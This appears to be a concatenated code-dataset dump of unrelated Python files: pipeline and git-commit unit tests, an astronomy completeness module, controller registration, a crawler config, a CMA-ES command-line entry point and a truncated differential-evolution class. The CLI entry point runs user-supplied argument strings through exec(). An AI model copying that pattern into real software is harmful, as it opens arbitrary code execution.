self.assertEqual(result[0].to_list(), ["name1", 1])
self.assertEqual(result[1].to_list(), ["name2", 2])
self.assertEqual(result[2].to_list(), ["name1", 3])
self.assertEqual(result[3].to_list(), ["name2", 4])
def test_iterator_consumption(self):
sequence = self.seq([1, 2, 3])
first_transform = sequence.map(lambda x: x)
second_transform = first_transform.map(lambda x: x)
first_list = list(first_transform)
second_list = list(second_transform)
expect = [1, 2, 3]
self.assertIteratorEqual(first_list, expect)
self.assertIteratorEqual(second_list, expect)
def test_single_call(self):
if self.seq is pseq:
raise self.skipTest("pseq doesn't support functions with side-effects")
counter = []
def counter_func(x):
counter.append(1)
return x
list(self.seq([1, 2, 3, 4]).map(counter_func))
self.assertEqual(len(counter), 4)
def test_seq(self):
self.assertIteratorEqual(self.seq([1, 2, 3]), [1, 2, 3])
self.assertIteratorEqual(self.seq(1, 2, 3), [1, 2, 3])
self.assertIteratorEqual(self.seq(1), [1])
self.assertIteratorEqual(self.seq(iter([1, 2, 3])), [1, 2, 3])
with self.assertRaises(TypeError):
self.seq()
def test_lineage_repr(self):
s = self.seq(1).map(lambda x: x).filter(lambda x: True)
self.assertEqual(
repr(s._lineage), "Lineage: sequence -> map(<lambda>) -> filter(<lambda>)"
)
def test_cache(self):
if self.seq is pseq:
raise self.skipTest("pseq doesn't support functions with side-effects")
calls = []
func = lambda x: calls.append(x)
result = self.seq(1, 2, 3).map(func).cache().map(lambda x: x).to_list()
self.assertEqual(len(calls), 3)
self.assertEqual(result, [None, None, None])
result = self.seq(1, 2, 3).map(lambda x: x).cache()
self.assertEqual(
repr(result._lineage), "Lineage: sequence -> map(<lambda>) -> cache"
)
result = self.seq(1, 2, 3).map(lambda x: x).cache(delete_lineage=True)
self.assertEqual(repr(result._lineage), "Lineage: sequence")
def test_tabulate(self):
sequence = seq([[1, 2, 3], [4, 5, 6]])
self.assertEqual(sequence.show(), None)
self.assertNotEqual(sequence._repr_html_(), None)
result = sequence.tabulate()
self.assertEqual(result, "- - -\n1 2 3\n4 5 6\n- - -")
sequence = seq(1, 2, 3)
self.assertEqual(sequence.tabulate(), None)
class NotTabulatable(object):
pass
sequence = seq(NotTabulatable(), NotTabulatable(), NotTabulatable())
self.assertEqual(sequence.tabulate(), None)
long_data = seq([(i, i + 1) for i in range(30)])
self.assertTrue("Showing 10 of 30 rows" in long_data.tabulate(n=10))
self.assertTrue("Showing 10 of 30 rows" in long_data._repr_html_())
self.assertTrue(
"Showing 10 of 30 rows" not in long_data.tabulate(n=10, tablefmt="plain")
)
def test_tabulate_namedtuple(self):
sequence_tabulated = seq([Data(1, 2), Data(6, 7)]).tabulate()
self.assertEqual(sequence_tabulated, " x y\n--- ---\n 1 2\n 6 7")
def test_repr_max_lines(self):
sequence = seq.range(200)
self.assertEqual(len(repr(sequence)), 395)
sequence._max_repr_items = None
self.assertEqual(len(repr(sequence)), 890)
class TestExtend(unittest.TestCase):
def test_custom_functions(self):
@extend(aslist=True)
def my_zip(it):
return zip(it, it)
result = seq.range(3).my_zip().list()
expected = list(zip(range(3), range(3)))
self.assertEqual(result, expected)
result = seq.range(3).my_zip().my_zip().list()
expected = list(zip(expected, expected))
self.assertEqual(result, expected)
@extend
def square(it):
return [i ** 2 for i in it]
result = seq.range(100).square().list()
expected = [i ** 2 for i in range(100)]
self.assertEqual(result, expected)
name = "PARALLEL_SQUARE"
@extend(parallel=True, name=name)
def square_parallel(it):
return [i ** 2 for i in it]
result = seq.range(100).square_parallel()
self.assertEqual(result.sum(), sum(expected))
self.assertEqual(
repr(result._lineage), "Lineage: sequence -> extended[%s]" % name
)
@extend
def my_filter(it, n=10):
return (i for i in it if i > n)
# test keyword args
result = seq.range(20).my_filter(n=10).list()
expected = list(filter(lambda x: x > 10, range(20)))
self.assertEqual(result, expected)
# test args
result = seq.range(20).my_filter(10).list()
self.assertEqual(result, expected)
# test final
@extend(final=True)
def toarray(it):
return array.array("f", it)
result = seq.range(10).toarray()
expected = array.array("f", range(10))
self.assertEqual(result, expected)
result = seq.range(10).map(lambda x: x ** 2).toarray()
expected = array.array("f", [i ** 2 for i in range(10)])
self.assertEqual(result, expected)
# a more complex example combining all above
@extend()
def sum_pair(it):
return (i[0] + i[1] for i in it)
result = (
seq.range(100).my_filter(85).my_zip().sum_pair().square_parallel().toarray()
)
expected = array.array(
"f",
list(
map(
lambda x: (x[0] + x[1]) ** 2,
map(lambda x: (x, x), filter(lambda x: x > 85, range(100))),
)
),
)
self.assertEqual(result, expected)
class TestParallelPipeline(TestPipeline):
def setUp(self):
self.seq = pseq
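# Illustrative, standalone usage sketch (not an extra test case) of the chaining
# API exercised above; `seq` is the same entry point the tests already import.
if __name__ == "__main__":
    print(seq([("a", 1), ("a", 2), ("b", 3)]).reduce_by_key(lambda x, y: x + y).to_dict())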
| 2.46875 | 2 |
tests/test_git_commit_one_file.py | mubashshirjamal/code | 1,582 | 11009 | <reponame>mubashshirjamal/code
# -*- coding: utf-8 -*-
import os
from vilya.models.project import CodeDoubanProject
from vilya.models import git
from tests.base import TestCase
from tests.utils import mkdtemp
from vilya.libs import gyt
from vilya.libs.permdir import get_repo_root
class TestGit(TestCase):
@property
def u(self):
return self.addUser()
def _path(self, name):
return os.path.join(get_repo_root(), '%s.git' % name)
def _path_work_tree(self, name):
return os.path.join(get_repo_root(), '%s.work_tree' % name)
def _repo(self, name, bare=True):
git_path = self._path(name)
if bare:
work_tree_path = None
else:
work_tree_path = self._path_work_tree(name)
if not os.path.exists(work_tree_path):
os.mkdir(work_tree_path)
try:
CodeDoubanProject.create_git_repo(git_path)
except:
pass
repo = git.GitRepo(git_path, work_tree=work_tree_path)
return repo
def _commit(self, repo, filename, content='testcontent',
message='testmessage'):
        # TODO allow committing more than one file
assert os.path.exists(repo.work_tree), \
"repo.work_tree must exist, check if repo has been created with bare=False" # noqa
path = os.path.join(repo.work_tree, filename)
dir_ = os.path.dirname(path)
if not os.path.exists(dir_):
os.makedirs(os.path.dirname(path))
f = open(path, 'w')
f.write(content)
f.close()
rep2 = gyt.repo(repo.path, repo.work_tree, bare=False)
rep2.call(['add', filename])
rep2.call(['commit', filename, '-m', message], _env=self.env_for_git)
return gyt.repo(repo.path).sha()
def test_simple_commit(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'testfile1', 'content1', 'msg1')
src = repo.get_src('testfile1')
assert src == ('blob', u'content1')
repo.commit_one_file('testfile1', 'content1 modified',
'change1', self.u, orig_hash=hash('content1'))
src = repo.get_src('testfile1')
assert src == ('blob', u'content1 modified')
def test_simple_commit_do_not_delete_other_files(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'testfile1', 'content1', 'msg1')
self._commit(repo, 'testfile2', 'content2', 'msg2')
repo.commit_one_file('testfile1', 'content1 modified',
'change1', self.u, orig_hash=hash('content1'))
src = repo.get_src('testfile1')
assert src == ('blob', u'content1 modified')
type_, files = repo.get_src('')
assert any(d['path'] == 'testfile2' for d in files), \
"testfile2 should exists in root tree"
src = repo.get_src('testfile2')
assert src == ('blob', u'content2')
def test_commit_in_inner_directory(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'test/file1', 'content1', 'msg1')
src = repo.get_src('test/file1')
assert src == ('blob', u'content1')
repo.commit_one_file('test/file1', 'content1 modified',
'change1', self.u, orig_hash=hash('content1'))
src = repo.get_src('test/file1')
assert src == ('blob', u'content1 modified')
def test_create_file(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'file1', 'content1', 'msg1')
repo.commit_one_file(
'file2', 'content2 created', 'create1', self.u)
assert repo.cat('HEAD:file1') == 'content1'
assert repo.cat('HEAD:file2') == 'content2 created'
def test_create_first_file(self):
repo = self._repo('test', bare=False)
repo.commit_one_file(
'file1', 'content1 created', 'create1', self.u)
assert repo.cat('HEAD:file1') == 'content1 created'
def test_create_first_file_and_more(self):
repo = self._repo('test', bare=False)
repo.commit_one_file(
'file1', 'content1 created', 'create1', self.u)
repo.commit_one_file(
'file2', 'content2 created', 'create2', self.u)
repo.commit_one_file(
'file3', 'content3 created', 'create3', self.u)
repo.commit_one_file(
'file4', 'content4 created', 'create4', self.u)
assert repo.cat('HEAD:file1') == 'content1 created'
assert repo.cat('HEAD:file2') == 'content2 created'
assert repo.cat('HEAD:file3') == 'content3 created'
assert repo.cat('HEAD:file4') == 'content4 created'
def test_commit_file_on_dirty_index(self):
repo = self._repo('test', bare=False)
repo.commit_one_file(
'file1', 'content1 created', 'create1', self.u)
repo.commit_one_file(
'file2', 'content2 created', 'create2', self.u)
repo.commit_one_file(
'file1', 'content1 modified', 'modify1', self.u)
# Now artificially rewind the index tree state
repo.call('read-tree HEAD^')
repo.commit_one_file(
'file2', 'content2 modified', 'modify2', self.u)
# the latest commit should not have anything related to file1
assert 'file1' not in repo.call('log -p -n1')
def test_create_file_in_dir(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'test/file1', 'content1', 'msg1')
repo.commit_one_file(
'test/file2', 'content2 created', 'create1', self.u)
assert repo.cat('HEAD:test/file1') == 'content1'
assert repo.cat('HEAD:test/file2') == 'content2 created'
def test_simple_commit_in_branch(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'testfile1', 'content1', 'msg1')
tmp_branch = repo.temp_branch_name()
repo.commit_one_file('testfile1', 'content1 modified', 'change1',
self.u, orig_hash=hash('content1'),
branch=tmp_branch)
with mkdtemp() as tmpdir:
gyt.call(['git', 'clone', repo.path, tmpdir])
repo_check = gyt.repo(tmpdir, bare=False)
src = repo_check.call('show HEAD:testfile1')
assert src == u'content1'
repo_check.call('checkout master')
src = repo_check.call('show HEAD:testfile1')
assert src == u'content1'
repo_check.call('checkout %s' % tmp_branch)
src = repo_check.call('show HEAD:testfile1')
assert src == u'content1 modified'
repo_check.call('checkout master')
src = repo_check.call('show HEAD:testfile1')
assert src == u'content1'
def test_simple_commit_in_branch_in_subdir(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'test/file1', 'content1', 'msg1')
tmp_branch = repo.temp_branch_name()
repo.commit_one_file('test/file1', 'content1 modified', 'change1',
self.u, orig_hash=hash('content1'),
branch=tmp_branch)
with mkdtemp() as tmpdir:
gyt.call(['git', 'clone', repo.path, tmpdir])
repo_check = gyt.repo(tmpdir, bare=False)
src = repo_check.call('show HEAD:test/file1')
assert src == u'content1'
repo_check.call('checkout master')
src = repo_check.call('show HEAD:test/file1')
assert src == u'content1'
repo_check.call('checkout %s' % tmp_branch)
src = repo_check.call('show HEAD:test/file1')
assert src == u'content1 modified'
repo_check.call('checkout master')
src = repo_check.call('show HEAD:test/file1')
assert src == u'content1'
def test_simple_commit_in_branch_creates_branch(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'testfile1', 'content1', 'msg1')
assert repo.get_branches() == ['master']
tmp_branch = repo.temp_branch_name()
repo.commit_one_file('testfile1', 'content1 modified', 'change1',
self.u, orig_hash=hash('content1'),
branch=tmp_branch)
assert repo.get_branches() == ['master', tmp_branch]
def test_simple_commit_in_branch_and_delete_branch(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'testfile1', 'content1', 'msg1')
tmp_branch = repo.temp_branch_name()
repo.commit_one_file('testfile1', 'content1 modified', 'change1',
self.u, orig_hash=hash('content1'),
branch=tmp_branch)
assert tmp_branch in repo.get_branches()
repo.remove_temp_branch(tmp_branch)
assert tmp_branch not in repo.get_branches()
assert repo.get_branches() == ['master']
def test_simple_commit_in_another_branch(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'testfile1', 'content1', 'msg1')
branch = 'mybranch'
repo.commit_one_file('testfile1', 'content1 modified', 'change1',
self.u, orig_hash=hash('content1'), branch=branch)
assert branch in repo.get_branches()
assert set(repo.get_branches()) == set(['master', branch])
| 2.21875 | 2 |
py/desitarget/train/data_preparation/PredCountsFromQLF_ClassModule.py | echaussidon/desitarget | 13 | 11010 | <reponame>echaussidon/desitarget
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
import re
import numpy as np
from scipy.interpolate import interp2d
from scipy.interpolate import interp1d
class PredCountsFromQLF_Class():
def __init__(self):
self.QLF_OK = False
self.EFF_OK = False
self.QLF_EFF_OK = False
# QLF
self.QLF_nz = 0
self.QLF_stepz = 0
# self.QLF_tabz = None
self.QLF_zlimit = None
self.QLF_nmag = 0
self.QLF_stepmag = 0
self.QLF_tabmag = None
self.QLF_maglimit = None
self.QLF_dNdzdmag = None
self.QLF_Ndzdmag = None
# EFF
self.EFF_zlimit = None
self.EFF_maglimit = None
self.EFF_dzdmag = None
# QLF_EFF
self.QLF_EFF_zlimit = None
self.QLF_EFF_maglimit = None
self.interpEFF_dzdmag = None
self.interpQLF_dNdzdmag = None
self.interpQLF_EFF_dNdzdmag = None
self.QLF_EFF_dNdz = None
self.QLF4Compl_dNdz = None
self.Compl_dz = None
self.QLF_EFF_dNdmag = None
self.QLF4Compl_dNdmag = None
self.Compl_dmag = None
self.QLF_EFF_dNdzdmag = None
self.QLF4Compl_dNdzdmag = None
self.Compl_dzdmag = None
def LoadQLF_Data(self, fpn_QLF_Data, mMzred=np.array([0., 6.]), skyArea=10000.):
# Data loading in "dataStr"
dataStr = np.loadtxt(fpn_QLF_Data, dtype=str, delimiter='\n')
self.QLF_nz = len(re.findall(r'\d+(?:\.\d+)?', dataStr[0])) - 1
self.QLF_nmag = len(dataStr)
# ZRED
self.QLF_zlimit = np.linspace(mMzred[0], mMzred[1], self.QLF_nz + 1, endpoint=True)
self.QLF_stepz = self.QLF_zlimit[1] - self.QLF_zlimit[0]
# self.QLF_tabz = self.QLF_zlimit[0:-1] + self.QLF_stepz / 2.
self.QLF_tabmag = np.zeros(self.QLF_nmag)
self.QLF_dNdzdmag = np.zeros((self.QLF_nmag + 1, self.QLF_nz + 1))
for nL, line in enumerate(dataStr):
dNdzdmag = re.findall(r'\d+(?:\.\d+)?', line)
            dNdzdmag = np.asarray(dNdzdmag).astype(float)  # np.float alias was removed in newer NumPy; plain float is equivalent
self.QLF_tabmag[nL] = dNdzdmag[0]
self.QLF_dNdzdmag[nL + 1, 1:] = dNdzdmag[1:]
self.QLF_stepmag = self.QLF_tabmag[1] - self.QLF_tabmag[0]
# MAG
self.QLF_maglimit = np.zeros(self.QLF_nmag + 1)
self.QLF_maglimit[0:-1] = self.QLF_tabmag - self.QLF_stepmag / 2.
self.QLF_maglimit[-1] = self.QLF_maglimit[-2] + self.QLF_stepmag
self.QLF_dNdzdmag /= skyArea
self.QLF_Ndzdmag = np.cumsum(np.cumsum(
self.QLF_dNdzdmag, axis=0), axis=1)
self.QLF_OK = True
self.QLF_EFF_OK = False
def LoadEffData(self, EFFdata, EFFzlimit, EFFmaglimit):
self.EFF_dzdmag = np.copy(EFFdata)
self.EFF_zlimit = np.copy(EFFzlimit)
self.EFF_maglimit = np.copy(EFFmaglimit)
self.EFF_OK = True
self.QLF_EFF_OK = False
def PrelOpFunc(self):
if self.QLF_OK & self.EFF_OK & (not self.QLF_EFF_OK):
# QLF_EFF_zlimit
self.QLF_EFF_zlimit = np.unique(np.hstack((self.QLF_zlimit, self.EFF_zlimit)))
maxQLF_EFF_zlimit = min(float(np.max(self.QLF_zlimit)),
float(np.max(self.EFF_zlimit)))
minQLF_EFF_zlimit = max(float(np.min(self.QLF_zlimit)),
float(np.min(self.EFF_zlimit)))
test = (self.QLF_EFF_zlimit >= minQLF_EFF_zlimit) & \
(self.QLF_EFF_zlimit <= maxQLF_EFF_zlimit)
self.QLF_EFF_zlimit = self.QLF_EFF_zlimit[test]
# QLF_EFFmaglimit
self.QLF_EFF_maglimit = np.unique(
np.hstack((self.QLF_maglimit,
self.EFF_maglimit)))
maxQLF_EFF_maglimit = min(float(np.max(self.QLF_maglimit)),
float(np.max(self.EFF_maglimit)))
minQLF_EFF_maglimit = max(float(np.min(self.QLF_maglimit)),
float(np.min(self.EFF_maglimit)))
test = (self.QLF_EFF_maglimit >= minQLF_EFF_maglimit) & \
(self.QLF_EFF_maglimit <= maxQLF_EFF_maglimit)
self.QLF_EFF_maglimit = self.QLF_EFF_maglimit[test]
xnew = self.QLF_EFF_zlimit
ynew = self.QLF_EFF_maglimit
# EFF
x = self.EFF_zlimit.flatten()
y = self.EFF_maglimit.flatten()
z = self.EFF_dzdmag
# ==============================================================================
# f2d_EFF = interp2d(x, y, z, kind = 'linear',
# copy = True, bounds_error = True)
# interpEFF_dzdmag = f2d_EFF(xnew, ynew)
# ==============================================================================
interpXinds = np.digitize(xnew, x, right=True) - 1
interpXinds = np.maximum(interpXinds, 0)
interpYinds = np.digitize(ynew, y, right=True) - 1
interpYinds = np.maximum(interpYinds, 0)
interpXYgridInds = np.meshgrid(interpXinds, interpYinds)
self.interpEFF_dzdmag = z[interpXYgridInds[1],
interpXYgridInds[0]]
# QLF
x = self.QLF_zlimit.flatten()
y = self.QLF_maglimit.flatten()
z = self.QLF_Ndzdmag
f2d_QLF = interp2d(x, y, z, kind='linear', copy=True, bounds_error=True)
interpQLF_Ndzdmag = f2d_QLF(xnew, ynew)
interpQLF_dNdzdmag = np.copy(interpQLF_Ndzdmag)
interpQLF_dNdzdmag[:, 1:] -= np.copy(interpQLF_dNdzdmag[:, :-1])
interpQLF_dNdzdmag[1:, :] -= np.copy(interpQLF_dNdzdmag[:-1, :])
self.interpQLF_dNdzdmag = interpQLF_dNdzdmag
interpQLF_EFF_dNdzdmag = np.zeros(self.interpQLF_dNdzdmag.shape)
interpQLF_EFF_dNdzdmag = self.interpEFF_dzdmag * self.interpQLF_dNdzdmag
self.interpQLF_EFF_dNdzdmag = interpQLF_EFF_dNdzdmag
self.QLF_EFF_OK = True
def ZREDComplEvalFunc(self, zlimit):
if self.QLF_EFF_OK:
xnew = self.QLF_EFF_zlimit
assert(np.min(zlimit) >= np.min(xnew))
assert(np.max(zlimit) <= np.max(xnew))
interpQLF_dNdz = np.sum(self.interpQLF_dNdzdmag, axis=0)
interpQLF_Ndz = np.cumsum(interpQLF_dNdz)
# QLF_EFF dNdz
interpQLF_EFF_dNdz = np.sum(self.interpQLF_EFF_dNdzdmag, axis=0)
interpQLF_EFF_Ndz = np.cumsum(interpQLF_EFF_dNdz)
f1d_QLF_EFF = interp1d(xnew, interpQLF_EFF_Ndz, kind='linear', copy=True, bounds_error=True)
f1d_QLF = interp1d(xnew, interpQLF_Ndz, kind='linear', copy=True, bounds_error=True)
self.QLF_EFF_dNdz = f1d_QLF_EFF(zlimit)
self.QLF_EFF_dNdz[1:] -= np.copy(self.QLF_EFF_dNdz[:-1])
self.QLF4Compl_dNdz = f1d_QLF(zlimit)
self.QLF4Compl_dNdz[1:] -= np.copy(self.QLF4Compl_dNdz[:-1])
self.Compl_dz = self.QLF_EFF_dNdz[1:] / self.QLF4Compl_dNdz[1:]
self.Compl_dz[np.isnan(self.Compl_dz)] = 0.
return self.Compl_dz
def RComplEvalFunc(self, maglimit):
if self.QLF_EFF_OK:
ynew = self.QLF_EFF_maglimit
assert(np.min(maglimit) >= np.min(ynew))
assert(np.max(maglimit) <= np.max(ynew))
interpQLF_dNdmag = np.sum(self.interpQLF_dNdzdmag, axis=1)
interpQLF_Ndmag = np.cumsum(interpQLF_dNdmag)
# QLF_EFF dNdmag
interpQLF_EFF_dNdmag = np.sum(self.interpQLF_EFF_dNdzdmag, axis=1)
interpQLF_EFF_Ndmag = np.cumsum(interpQLF_EFF_dNdmag)
f1d_QLF_EFF = interp1d(ynew, interpQLF_EFF_Ndmag, kind='linear', copy=True, bounds_error=True)
f1d_QLF = interp1d(ynew, interpQLF_Ndmag, kind='linear', copy=True, bounds_error=True)
self.QLF_EFF_dNdmag = f1d_QLF_EFF(maglimit)
self.QLF_EFF_dNdmag[1:] -= np.copy(self.QLF_EFF_dNdmag[:-1])
self.QLF4Compl_dNdmag = f1d_QLF(maglimit)
self.QLF4Compl_dNdmag[1:] -= np.copy(self.QLF4Compl_dNdmag[:-1])
self.Compl_dmag = self.QLF_EFF_dNdmag[1:] / self.QLF4Compl_dNdmag[1:]
self.Compl_dmag[np.isnan(self.Compl_dmag)] = 0.
return self.Compl_dmag
def R_ZREDComplEvalFunc(self, zlimit, maglimit):
if self.QLF_EFF_OK:
xnew = self.QLF_EFF_zlimit
assert(np.min(zlimit) >= np.min(xnew))
assert(np.max(zlimit) <= np.max(xnew))
ynew = self.QLF_EFF_maglimit
assert(np.min(maglimit) >= np.min(ynew))
assert(np.max(maglimit) <= np.max(ynew))
interpQLF_EFF_Ndzdmag = np.cumsum(np.cumsum(self.interpQLF_EFF_dNdzdmag, axis=0), axis=1)
f2d_QLF_EFF = interp2d(xnew, ynew, interpQLF_EFF_Ndzdmag, kind='linear', copy=True, bounds_error=True)
QLF_EFF4Compl_Ndzdmag = f2d_QLF_EFF(zlimit, maglimit)
QLF_EFF4Compl_dNdzdmag = np.copy(QLF_EFF4Compl_Ndzdmag)
QLF_EFF4Compl_dNdzdmag[:, 1:] -= np.copy(QLF_EFF4Compl_dNdzdmag[:, :-1])
QLF_EFF4Compl_dNdzdmag[1:, :] -= np.copy(QLF_EFF4Compl_dNdzdmag[:-1, :])
self.QLF_EFF4Compl_dNdzdmag = QLF_EFF4Compl_dNdzdmag
# QLF
interpQLF_Ndzdmag = np.cumsum(np.cumsum(self.interpQLF_dNdzdmag, axis=0), axis=1)
f2d_QLF = interp2d(xnew, ynew, interpQLF_Ndzdmag, kind='linear', copy=True, bounds_error=True)
QLF4Compl_Ndzdmag = f2d_QLF(zlimit, maglimit)
QLF4Compl_dNdzdmag = np.copy(QLF4Compl_Ndzdmag)
QLF4Compl_dNdzdmag[:, 1:] -= np.copy(QLF4Compl_dNdzdmag[:, :-1])
QLF4Compl_dNdzdmag[1:, :] -= np.copy(QLF4Compl_dNdzdmag[:-1, :])
self.QLF4Compl_dNdzdmag = QLF4Compl_dNdzdmag
self.Compl_dzdmag = self.QLF_EFF4Compl_dNdzdmag[1:, 1:] / self.QLF4Compl_dNdzdmag[1:, 1:]
self.Compl_dzdmag[np.isnan(self.Compl_dzdmag)] = 0.
return self.Compl_dzdmag
def R_ZRED_EffVarEvalFunc(self, OBJ_QSO_dNdzdmag):
self.EffVar4Compl_dzdmag = None
self.Eff4Compl_dzdmag = np.copy(self.Compl_dzdmag)
if True:
self.EffVar4Compl_dzdmag = self.Eff4Compl_dzdmag * (1. - self.Eff4Compl_dzdmag)
self.EffVar4Compl_dzdmag /= OBJ_QSO_dNdzdmag
self.EffVar4Compl_dzdmag[OBJ_QSO_dNdzdmag == 0.] = 0.
else:
self.Count4Complt_Ndzdmag = self.Eff4Compl_dzdmag * OBJ_QSO_dNdzdmag
self.EffVar4Compl_dzdmag = OBJ_QSO_dNdzdmag - self.Count4Complt_Ndzdmag + 1.
self.EffVar4Compl_dzdmag *= self.Count4Complt_Ndzdmag + 1.
self.EffVar4Compl_dzdmag /= (OBJ_QSO_dNdzdmag + 2)**2 * (OBJ_QSO_dNdzdmag + 3)
self.EffVar4Compl_dzdmag[OBJ_QSO_dNdzdmag == 0.] = 0.
return self.EffVar4Compl_dzdmag
def ZRED_EffVarEvalFunc(self):
self.EffVar4Compl_dz = self.EffVar4Compl_dzdmag * (self.QLF4Compl_dNdzdmag[1:, 1:])**2
self.EffVar4Compl_dz = np.sum(self.EffVar4Compl_dz, axis=0)
tmp_var = np.sum(self.QLF4Compl_dNdzdmag[1:, 1:], axis=0)**2
self.EffVar4Compl_dz /= tmp_var
self.EffVar4Compl_dz[tmp_var == 0.] = 0.
return self.EffVar4Compl_dz
def R_EffVarEvalFunc(self):
self.EffVar4Compl_dmag = self.EffVar4Compl_dzdmag * (self.QLF4Compl_dNdzdmag[1:, 1:])**2
self.EffVar4Compl_dmag = np.sum(self.EffVar4Compl_dmag, axis=1)
tmp_var = np.sum(self.QLF4Compl_dNdzdmag[1:, 1:], axis=1)**2
self.EffVar4Compl_dmag /= tmp_var
self.EffVar4Compl_dmag[tmp_var == 0.] = 0.
return self.EffVar4Compl_dmag
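# Usage sketch (illustrative only; the file name, efficiency grid and bin edges
# below are placeholders): the intended call order is LoadQLF_Data ->
# LoadEffData -> PrelOpFunc, after which the *ComplEvalFunc methods can be
# queried on arbitrary bin edges.
if __name__ == "__main__":
    pred = PredCountsFromQLF_Class()
    # pred.LoadQLF_Data("qlf_dNdzdmag.txt", mMzred=np.array([0., 6.]), skyArea=10000.)
    # pred.LoadEffData(EFFdata, EFFzlimit, EFFmaglimit)
    # pred.PrelOpFunc()
    # compl_dz = pred.ZREDComplEvalFunc(zlimit=np.linspace(0.5, 5.5, 11))
    print(pred.QLF_OK, pred.EFF_OK)  # both False until QLF and efficiency data are loaded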
| 1.914063 | 2 |
safe_control_gym/controllers/__init__.py | gokhanalcan/safe-control-gym | 0 | 11011 | """Register controllers.
"""
from safe_control_gym.utils.registration import register
register(id="mpc",
entry_point="safe_control_gym.controllers.mpc.mpc:MPC",
config_entry_point="safe_control_gym.controllers.mpc:mpc.yaml")
register(id="linear_mpc",
entry_point="safe_control_gym.controllers.mpc.linear_mpc:LinearMPC",
config_entry_point="safe_control_gym.controllers.mpc:linear_mpc.yaml")
register(id="gp_mpc",
entry_point="safe_control_gym.controllers.mpc.gp_mpc:GPMPC",
config_entry_point="safe_control_gym.controllers.mpc:gp_mpc.yaml")
register(id="mpsc",
entry_point="safe_control_gym.controllers.mpsc.mpsc:MPSC",
config_entry_point="safe_control_gym.controllers.mpsc:mpsc.yaml")
register(id="ppo",
entry_point="safe_control_gym.controllers.ppo.ppo:PPO",
config_entry_point="safe_control_gym.controllers.ppo:ppo.yaml")
register(id="safe_explorer_ppo",
entry_point="safe_control_gym.controllers.safe_explorer.safe_ppo:SafeExplorerPPO",
config_entry_point="safe_control_gym.controllers.safe_explorer:safe_ppo.yaml")
| 1.429688 | 1 |
tests/plot_profile/test_utils.py | mizeller/plot_profile | 0 | 11012 | """Test module ``plot_profile/utils.py``."""
# Standard library
import logging
# First-party
from plot_profile.utils import count_to_log_level
def test_count_to_log_level():
assert count_to_log_level(0) == logging.ERROR
assert count_to_log_level(1) == logging.WARNING
assert count_to_log_level(2) == logging.INFO
assert count_to_log_level(3) == logging.DEBUG
| 2.015625 | 2 |
spider/utilities/util_config.py | YunofHD/PSpider | 0 | 11013 | <reponame>YunofHD/PSpider<gh_stars>0
# _*_ coding: utf-8 _*_
"""
util_config.py by xianhu
"""
__all__ = [
"CONFIG_FETCH_MESSAGE",
"CONFIG_PARSE_MESSAGE",
"CONFIG_MESSAGE_PATTERN",
"CONFIG_URL_LEGAL_PATTERN",
"CONFIG_URL_ILLEGAL_PATTERN",
]
# define the structure of message, used in Fetcher and Parser
CONFIG_FETCH_MESSAGE = "priority=%s, keys=%s, deep=%s, repeat=%s, url=%s"
CONFIG_PARSE_MESSAGE = "priority=%s, keys=%s, deep=%s, url=%s"
CONFIG_MESSAGE_PATTERN = r"priority=(?P<priority>\d+),\s*keys=(?P<keys>.+?),\s*deep=(?P<deep>\d+),\s*(repeat=(?P<repeat>\d+),\s*)?url=(?P<url>.+)$"
# define url_legal_pattern and url_illegal_pattern
CONFIG_URL_LEGAL_PATTERN = r"^https?:[^\s]+?\.[^\s]+?"
CONFIG_URL_ILLEGAL_PATTERN = r"\.(cab|iso|zip|rar|tar|gz|bz2|7z|tgz|apk|exe|app|pkg|bmg|rpm|deb|dmg|jar|jad|bin|msi|" \
"pdf|doc|docx|xls|xlsx|ppt|pptx|txt|md|odf|odt|rtf|py|java|c|cc|js|css|log|csv|tsv|" \
"jpg|jpeg|png|gif|bmp|xpm|xbm|ico|drm|dxf|eps|psd|pcd|pcx|tif|tiff|" \
"mp3|mp4|swf|mkv|avi|flv|mov|wmv|wma|3gp|mpg|mpeg|mp4a|wav|ogg|rmvb)$"
| 1.789063 | 2 |
modcma/__main__.py | IOHprofiler/ModularCMAES | 2 | 11014 | """Allows the user to call the library as a cli-module."""
from argparse import ArgumentParser
from .modularcmaes import evaluate_bbob
parser = ArgumentParser(description="Run single function CMAES")
parser.add_argument(
"-f", "--fid", type=int, help="bbob function id", required=False, default=5
)
parser.add_argument(
"-d", "--dim", type=int, help="dimension", required=False, default=5
)
parser.add_argument(
"-i",
"--iterations",
type=int,
help="number of iterations per agent",
required=False,
default=50,
)
parser.add_argument(
"-l", "--logging", required=False, action="store_true", default=False
)
parser.add_argument("-L", "--label", type=str, required=False, default="")
parser.add_argument("-s", "--seed", type=int, required=False, default=42)
parser.add_argument("-p", "--data_folder", type=str, required=False)
parser.add_argument("-a", "--arguments", nargs="+", required=False)
args = vars(parser.parse_args())
for arg in args.pop("arguments") or []:
# pylint: disable=exec-used
exec(arg, None, args)
evaluate_bbob(**args)
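# Example invocations (illustrative values; run from an environment where the
# modcma package is importable):
#   python -m modcma -f 5 -d 10 -i 50 -s 42
#   python -m modcma -f 12 -d 2 -l -L demo-run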
| 2.953125 | 3 |
src/rto/optimization/solvers/de.py | vicrsp/rto | 0 | 11015 | <filename>src/rto/optimization/solvers/de.py
import numpy as np
class DifferentialEvolution:
def __init__(self, lb, ub, mutation_prob=0.5, pop_size=10, max_generations=100, de_type='rand/1/bin', callback=None):
self.lb = np.asarray(lb).reshape(1, -1)
self.ub = np.asarray(ub).reshape(1, -1)
self.population_size = pop_size
self.max_generations = max_generations
self.num_variables = len(lb)
self.mutation_prob = mutation_prob
self.callback = callback
self.base, self.d, self.rec = de_type.split('/')
self.norm_lb = self.normalize(self.lb).flatten()
self.norm_ub = self.normalize(self.ub).flatten()
self.reset()
def reset(self):
self.fobj_evals = 0
self.population_fobj = []
self.best_objective = np.Infinity
self.best_solution = []
def normalize(self, x):
norm_x = np.zeros_like(x)
for i in range(x.shape[0]):
norm_x[i, :] = 100 * (x[i] - self.lb) / (self.ub - self.lb)
return norm_x
def denormalize(self, x):
xr = x.reshape(-1, self.num_variables)
